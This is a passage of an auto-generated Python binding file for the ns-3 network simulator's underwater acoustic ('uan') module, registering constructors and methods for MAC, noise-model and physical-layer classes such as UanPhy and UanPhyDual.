[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## uan-mac-rc.h (module 'uan'): ns3::Address ns3::UanMacRc::GetAddress() [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_virtual=True)
## uan-mac-rc.h (module 'uan'): ns3::Address ns3::UanMacRc::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## uan-mac-rc.h (module 'uan'): static ns3::TypeId ns3::UanMacRc::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-mac-rc.h (module 'uan'): void ns3::UanMacRc::SetAddress(ns3::UanAddress addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::UanAddress', 'addr')],
is_virtual=True)
## uan-mac-rc.h (module 'uan'): void ns3::UanMacRc::SetForwardUpCb(ns3::Callback<void, ns3::Ptr<ns3::Packet>, ns3::UanAddress const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetForwardUpCb',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::UanAddress const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-mac-rc.h (module 'uan'): void ns3::UanMacRc::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3UanMacRcGw_methods(root_module, cls):
## uan-mac-rc-gw.h (module 'uan'): ns3::UanMacRcGw::UanMacRcGw(ns3::UanMacRcGw const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanMacRcGw const &', 'arg0')])
## uan-mac-rc-gw.h (module 'uan'): ns3::UanMacRcGw::UanMacRcGw() [constructor]
cls.add_constructor([])
## uan-mac-rc-gw.h (module 'uan'): int64_t ns3::UanMacRcGw::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): void ns3::UanMacRcGw::AttachPhy(ns3::Ptr<ns3::UanPhy> phy) [member function]
cls.add_method('AttachPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'phy')],
is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): void ns3::UanMacRcGw::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): bool ns3::UanMacRcGw::Enqueue(ns3::Ptr<ns3::Packet> pkt, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Enqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): ns3::Address ns3::UanMacRcGw::GetAddress() [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): ns3::Address ns3::UanMacRcGw::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): static ns3::TypeId ns3::UanMacRcGw::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-mac-rc-gw.h (module 'uan'): void ns3::UanMacRcGw::SetAddress(ns3::UanAddress addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::UanAddress', 'addr')],
is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): void ns3::UanMacRcGw::SetForwardUpCb(ns3::Callback<void, ns3::Ptr<ns3::Packet>, ns3::UanAddress const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetForwardUpCb',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::UanAddress const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): void ns3::UanMacRcGw::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3UanNoiseModel_methods(root_module, cls):
## uan-noise-model.h (module 'uan'): ns3::UanNoiseModel::UanNoiseModel() [constructor]
cls.add_constructor([])
## uan-noise-model.h (module 'uan'): ns3::UanNoiseModel::UanNoiseModel(ns3::UanNoiseModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanNoiseModel const &', 'arg0')])
## uan-noise-model.h (module 'uan'): void ns3::UanNoiseModel::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-noise-model.h (module 'uan'): void ns3::UanNoiseModel::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
is_virtual=True)
## uan-noise-model.h (module 'uan'): double ns3::UanNoiseModel::GetNoiseDbHz(double fKhz) const [member function]
cls.add_method('GetNoiseDbHz',
'double',
[param('double', 'fKhz')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-noise-model.h (module 'uan'): static ns3::TypeId ns3::UanNoiseModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanNoiseModelDefault_methods(root_module, cls):
## uan-noise-model-default.h (module 'uan'): ns3::UanNoiseModelDefault::UanNoiseModelDefault(ns3::UanNoiseModelDefault const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanNoiseModelDefault const &', 'arg0')])
## uan-noise-model-default.h (module 'uan'): ns3::UanNoiseModelDefault::UanNoiseModelDefault() [constructor]
cls.add_constructor([])
## uan-noise-model-default.h (module 'uan'): double ns3::UanNoiseModelDefault::GetNoiseDbHz(double fKhz) const [member function]
cls.add_method('GetNoiseDbHz',
'double',
[param('double', 'fKhz')],
is_const=True, is_virtual=True)
## uan-noise-model-default.h (module 'uan'): static ns3::TypeId ns3::UanNoiseModelDefault::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPhy_methods(root_module, cls):
## uan-phy.h (module 'uan'): ns3::UanPhy::UanPhy() [constructor]
cls.add_constructor([])
## uan-phy.h (module 'uan'): ns3::UanPhy::UanPhy(ns3::UanPhy const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhy const &', 'arg0')])
## uan-phy.h (module 'uan'): int64_t ns3::UanPhy::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::EnergyDepletionHandler() [member function]
cls.add_method('EnergyDepletionHandler',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): double ns3::UanPhy::GetCcaThresholdDb() [member function]
cls.add_method('GetCcaThresholdDb',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): ns3::Ptr<ns3::UanChannel> ns3::UanPhy::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::UanChannel >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-phy.h (module 'uan'): ns3::Ptr<ns3::UanNetDevice> ns3::UanPhy::GetDevice() [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::UanNetDevice >',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): ns3::UanTxMode ns3::UanPhy::GetMode(uint32_t n) [member function]
cls.add_method('GetMode',
'ns3::UanTxMode',
[param('uint32_t', 'n')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): uint32_t ns3::UanPhy::GetNModes() [member function]
cls.add_method('GetNModes',
'uint32_t',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): ns3::Ptr<ns3::Packet> ns3::UanPhy::GetPacketRx() const [member function]
cls.add_method('GetPacketRx',
'ns3::Ptr< ns3::Packet >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-phy.h (module 'uan'): double ns3::UanPhy::GetRxGainDb() [member function]
cls.add_method('GetRxGainDb',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): double ns3::UanPhy::GetRxThresholdDb() [member function]
cls.add_method('GetRxThresholdDb',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): ns3::Ptr<ns3::UanTransducer> ns3::UanPhy::GetTransducer() [member function]
cls.add_method('GetTransducer',
'ns3::Ptr< ns3::UanTransducer >',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): double ns3::UanPhy::GetTxPowerDb() [member function]
cls.add_method('GetTxPowerDb',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): static ns3::TypeId ns3::UanPhy::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-phy.h (module 'uan'): bool ns3::UanPhy::IsStateBusy() [member function]
cls.add_method('IsStateBusy',
'bool',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): bool ns3::UanPhy::IsStateCcaBusy() [member function]
cls.add_method('IsStateCcaBusy',
'bool',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): bool ns3::UanPhy::IsStateIdle() [member function]
cls.add_method('IsStateIdle',
'bool',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): bool ns3::UanPhy::IsStateRx() [member function]
cls.add_method('IsStateRx',
'bool',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): bool ns3::UanPhy::IsStateSleep() [member function]
cls.add_method('IsStateSleep',
'bool',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): bool ns3::UanPhy::IsStateTx() [member function]
cls.add_method('IsStateTx',
'bool',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyIntChange() [member function]
cls.add_method('NotifyIntChange',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyRxBegin(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('NotifyRxBegin',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyRxDrop(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('NotifyRxDrop',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyRxEnd(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('NotifyRxEnd',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyTransStartTx(ns3::Ptr<ns3::Packet> packet, double txPowerDb, ns3::UanTxMode txMode) [member function]
cls.add_method('NotifyTransStartTx',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'txPowerDb'), param('ns3::UanTxMode', 'txMode')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyTxBegin(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('NotifyTxBegin',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyTxDrop(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('NotifyTxDrop',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyTxEnd(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('NotifyTxEnd',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## uan-phy.h (module 'uan'): void ns3::UanPhy::RegisterListener(ns3::UanPhyListener * listener) [member function]
cls.add_method('RegisterListener',
'void',
[param('ns3::UanPhyListener *', 'listener')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SendPacket(ns3::Ptr<ns3::Packet> pkt, uint32_t modeNum) [member function]
cls.add_method('SendPacket',
'void',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('uint32_t', 'modeNum')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetCcaThresholdDb(double thresh) [member function]
cls.add_method('SetCcaThresholdDb',
'void',
[param('double', 'thresh')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetChannel(ns3::Ptr<ns3::UanChannel> channel) [member function]
cls.add_method('SetChannel',
'void',
[param('ns3::Ptr< ns3::UanChannel >', 'channel')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetDevice(ns3::Ptr<ns3::UanNetDevice> device) [member function]
cls.add_method('SetDevice',
'void',
[param('ns3::Ptr< ns3::UanNetDevice >', 'device')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetEnergyModelCallback(ns3::Callback<void, int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function]
cls.add_method('SetEnergyModelCallback',
'void',
[param('ns3::Callback< void, int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetMac(ns3::Ptr<ns3::UanMac> mac) [member function]
cls.add_method('SetMac',
'void',
[param('ns3::Ptr< ns3::UanMac >', 'mac')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetReceiveErrorCallback(ns3::Callback<void, ns3::Ptr<ns3::Packet>, double, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveErrorCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, double, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetReceiveOkCallback(ns3::Callback<void, ns3::Ptr<ns3::Packet>, double, ns3::UanTxMode, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveOkCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, double, ns3::UanTxMode, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetRxGainDb(double gain) [member function]
cls.add_method('SetRxGainDb',
'void',
[param('double', 'gain')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetRxThresholdDb(double thresh) [member function]
cls.add_method('SetRxThresholdDb',
'void',
[param('double', 'thresh')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetSleepMode(bool sleep) [member function]
cls.add_method('SetSleepMode',
'void',
[param('bool', 'sleep')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetTransducer(ns3::Ptr<ns3::UanTransducer> trans) [member function]
cls.add_method('SetTransducer',
'void',
[param('ns3::Ptr< ns3::UanTransducer >', 'trans')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetTxPowerDb(double txpwr) [member function]
cls.add_method('SetTxPowerDb',
'void',
[param('double', 'txpwr')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::StartRxPacket(ns3::Ptr<ns3::Packet> pkt, double rxPowerDb, ns3::UanTxMode txMode, ns3::UanPdp pdp) [member function]
cls.add_method('StartRxPacket',
'void',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('double', 'rxPowerDb'), param('ns3::UanTxMode', 'txMode'), param('ns3::UanPdp', 'pdp')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3UanPhyCalcSinr_methods(root_module, cls):
## uan-phy.h (module 'uan'): ns3::UanPhyCalcSinr::UanPhyCalcSinr() [constructor]
cls.add_constructor([])
## uan-phy.h (module 'uan'): ns3::UanPhyCalcSinr::UanPhyCalcSinr(ns3::UanPhyCalcSinr const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyCalcSinr const &', 'arg0')])
## uan-phy.h (module 'uan'): double ns3::UanPhyCalcSinr::CalcSinrDb(ns3::Ptr<ns3::Packet> pkt, ns3::Time arrTime, double rxPowerDb, double ambNoiseDb, ns3::UanTxMode mode, ns3::UanPdp pdp, std::list<ns3::UanPacketArrival, std::allocator<ns3::UanPacketArrival> > const & arrivalList) const [member function]
cls.add_method('CalcSinrDb',
'double',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Time', 'arrTime'), param('double', 'rxPowerDb'), param('double', 'ambNoiseDb'), param('ns3::UanTxMode', 'mode'), param('ns3::UanPdp', 'pdp'), param('std::list< ns3::UanPacketArrival > const &', 'arrivalList')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyCalcSinr::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-phy.h (module 'uan'): double ns3::UanPhyCalcSinr::DbToKp(double db) const [member function]
cls.add_method('DbToKp',
'double',
[param('double', 'db')],
is_const=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyCalcSinr::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
is_virtual=True)
## uan-phy.h (module 'uan'): static ns3::TypeId ns3::UanPhyCalcSinr::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-phy.h (module 'uan'): double ns3::UanPhyCalcSinr::KpToDb(double kp) const [member function]
cls.add_method('KpToDb',
'double',
[param('double', 'kp')],
is_const=True)
return
def register_Ns3UanPhyCalcSinrDefault_methods(root_module, cls):
## uan-phy-gen.h (module 'uan'): ns3::UanPhyCalcSinrDefault::UanPhyCalcSinrDefault(ns3::UanPhyCalcSinrDefault const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyCalcSinrDefault const &', 'arg0')])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyCalcSinrDefault::UanPhyCalcSinrDefault() [constructor]
cls.add_constructor([])
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyCalcSinrDefault::CalcSinrDb(ns3::Ptr<ns3::Packet> pkt, ns3::Time arrTime, double rxPowerDb, double ambNoiseDb, ns3::UanTxMode mode, ns3::UanPdp pdp, std::list<ns3::UanPacketArrival, std::allocator<ns3::UanPacketArrival> > const & arrivalList) const [member function]
cls.add_method('CalcSinrDb',
'double',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Time', 'arrTime'), param('double', 'rxPowerDb'), param('double', 'ambNoiseDb'), param('ns3::UanTxMode', 'mode'), param('ns3::UanPdp', 'pdp'), param('std::list< ns3::UanPacketArrival > const &', 'arrivalList')],
is_const=True, is_virtual=True)
## uan-phy-gen.h (module 'uan'): static ns3::TypeId ns3::UanPhyCalcSinrDefault::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPhyCalcSinrDual_methods(root_module, cls):
## uan-phy-dual.h (module 'uan'): ns3::UanPhyCalcSinrDual::UanPhyCalcSinrDual(ns3::UanPhyCalcSinrDual const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyCalcSinrDual const &', 'arg0')])
## uan-phy-dual.h (module 'uan'): ns3::UanPhyCalcSinrDual::UanPhyCalcSinrDual() [constructor]
cls.add_constructor([])
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyCalcSinrDual::CalcSinrDb(ns3::Ptr<ns3::Packet> pkt, ns3::Time arrTime, double rxPowerDb, double ambNoiseDb, ns3::UanTxMode mode, ns3::UanPdp pdp, std::list<ns3::UanPacketArrival, std::allocator<ns3::UanPacketArrival> > const & arrivalList) const [member function]
cls.add_method('CalcSinrDb',
'double',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Time', 'arrTime'), param('double', 'rxPowerDb'), param('double', 'ambNoiseDb'), param('ns3::UanTxMode', 'mode'), param('ns3::UanPdp', 'pdp'), param('std::list< ns3::UanPacketArrival > const &', 'arrivalList')],
is_const=True, is_virtual=True)
## uan-phy-dual.h (module 'uan'): static ns3::TypeId ns3::UanPhyCalcSinrDual::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPhyCalcSinrFhFsk_methods(root_module, cls):
## uan-phy-gen.h (module 'uan'): ns3::UanPhyCalcSinrFhFsk::UanPhyCalcSinrFhFsk(ns3::UanPhyCalcSinrFhFsk const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyCalcSinrFhFsk const &', 'arg0')])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyCalcSinrFhFsk::UanPhyCalcSinrFhFsk() [constructor]
cls.add_constructor([])
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyCalcSinrFhFsk::CalcSinrDb(ns3::Ptr<ns3::Packet> pkt, ns3::Time arrTime, double rxPowerDb, double ambNoiseDb, ns3::UanTxMode mode, ns3::UanPdp pdp, std::list<ns3::UanPacketArrival, std::allocator<ns3::UanPacketArrival> > const & arrivalList) const [member function]
cls.add_method('CalcSinrDb',
'double',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Time', 'arrTime'), param('double', 'rxPowerDb'), param('double', 'ambNoiseDb'), param('ns3::UanTxMode', 'mode'), param('ns3::UanPdp', 'pdp'), param('std::list< ns3::UanPacketArrival > const &', 'arrivalList')],
is_const=True, is_virtual=True)
## uan-phy-gen.h (module 'uan'): static ns3::TypeId ns3::UanPhyCalcSinrFhFsk::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPhyDual_methods(root_module, cls):
## uan-phy-dual.h (module 'uan'): ns3::UanPhyDual::UanPhyDual(ns3::UanPhyDual const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyDual const &', 'arg0')])
## uan-phy-dual.h (module 'uan'): ns3::UanPhyDual::UanPhyDual() [constructor]
cls.add_constructor([])
## uan-phy-dual.h (module 'uan'): int64_t ns3::UanPhyDual::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::EnergyDepletionHandler() [member function]
cls.add_method('EnergyDepletionHandler',
'void',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetCcaThresholdDb() [member function]
cls.add_method('GetCcaThresholdDb',
'double',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetCcaThresholdPhy1() const [member function]
cls.add_method('GetCcaThresholdPhy1',
'double',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetCcaThresholdPhy2() const [member function]
cls.add_method('GetCcaThresholdPhy2',
'double',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::UanChannel> ns3::UanPhyDual::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::UanChannel >',
[],
is_const=True, is_virtual=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::UanNetDevice> ns3::UanPhyDual::GetDevice() [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::UanNetDevice >',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): ns3::UanTxMode ns3::UanPhyDual::GetMode(uint32_t n) [member function]
cls.add_method('GetMode',
'ns3::UanTxMode',
[param('uint32_t', 'n')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): ns3::UanModesList ns3::UanPhyDual::GetModesPhy1() const [member function]
cls.add_method('GetModesPhy1',
'ns3::UanModesList',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): ns3::UanModesList ns3::UanPhyDual::GetModesPhy2() const [member function]
cls.add_method('GetModesPhy2',
'ns3::UanModesList',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): uint32_t ns3::UanPhyDual::GetNModes() [member function]
cls.add_method('GetNModes',
'uint32_t',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::Packet> ns3::UanPhyDual::GetPacketRx() const [member function]
cls.add_method('GetPacketRx',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True, is_virtual=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::UanPhyPer> ns3::UanPhyDual::GetPerModelPhy1() const [member function]
cls.add_method('GetPerModelPhy1',
'ns3::Ptr< ns3::UanPhyPer >',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::UanPhyPer> ns3::UanPhyDual::GetPerModelPhy2() const [member function]
cls.add_method('GetPerModelPhy2',
'ns3::Ptr< ns3::UanPhyPer >',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::Packet> ns3::UanPhyDual::GetPhy1PacketRx() const [member function]
cls.add_method('GetPhy1PacketRx',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::Packet> ns3::UanPhyDual::GetPhy2PacketRx() const [member function]
cls.add_method('GetPhy2PacketRx',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetRxGainDb() [member function]
cls.add_method('GetRxGainDb',
'double',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetRxGainDbPhy1() const [member function]
cls.add_method('GetRxGainDbPhy1',
'double',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetRxGainDbPhy2() const [member function]
cls.add_method('GetRxGainDbPhy2',
'double',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetRxThresholdDb() [member function]
cls.add_method('GetRxThresholdDb',
'double',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::UanPhyCalcSinr> ns3::UanPhyDual::GetSinrModelPhy1() const [member function]
cls.add_method('GetSinrModelPhy1',
'ns3::Ptr< ns3::UanPhyCalcSinr >',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::UanPhyCalcSinr> ns3::UanPhyDual::GetSinrModelPhy2() const [member function]
cls.add_method('GetSinrModelPhy2',
'ns3::Ptr< ns3::UanPhyCalcSinr >',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::UanTransducer> ns3::UanPhyDual::GetTransducer() [member function]
cls.add_method('GetTransducer',
'ns3::Ptr< ns3::UanTransducer >',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetTxPowerDb() [member function]
cls.add_method('GetTxPowerDb',
'double',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetTxPowerDbPhy1() const [member function]
cls.add_method('GetTxPowerDbPhy1',
'double',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetTxPowerDbPhy2() const [member function]
cls.add_method('GetTxPowerDbPhy2',
'double',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): static ns3::TypeId ns3::UanPhyDual::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsPhy1Idle() [member function]
cls.add_method('IsPhy1Idle',
'bool',
[])
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsPhy1Rx() [member function]
cls.add_method('IsPhy1Rx',
'bool',
[])
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsPhy1Tx() [member function]
cls.add_method('IsPhy1Tx',
'bool',
[])
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsPhy2Idle() [member function]
cls.add_method('IsPhy2Idle',
'bool',
[])
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsPhy2Rx() [member function]
cls.add_method('IsPhy2Rx',
'bool',
[])
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsPhy2Tx() [member function]
cls.add_method('IsPhy2Tx',
'bool',
[])
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsStateBusy() [member function]
cls.add_method('IsStateBusy',
'bool',
[],
is_virtual=True)
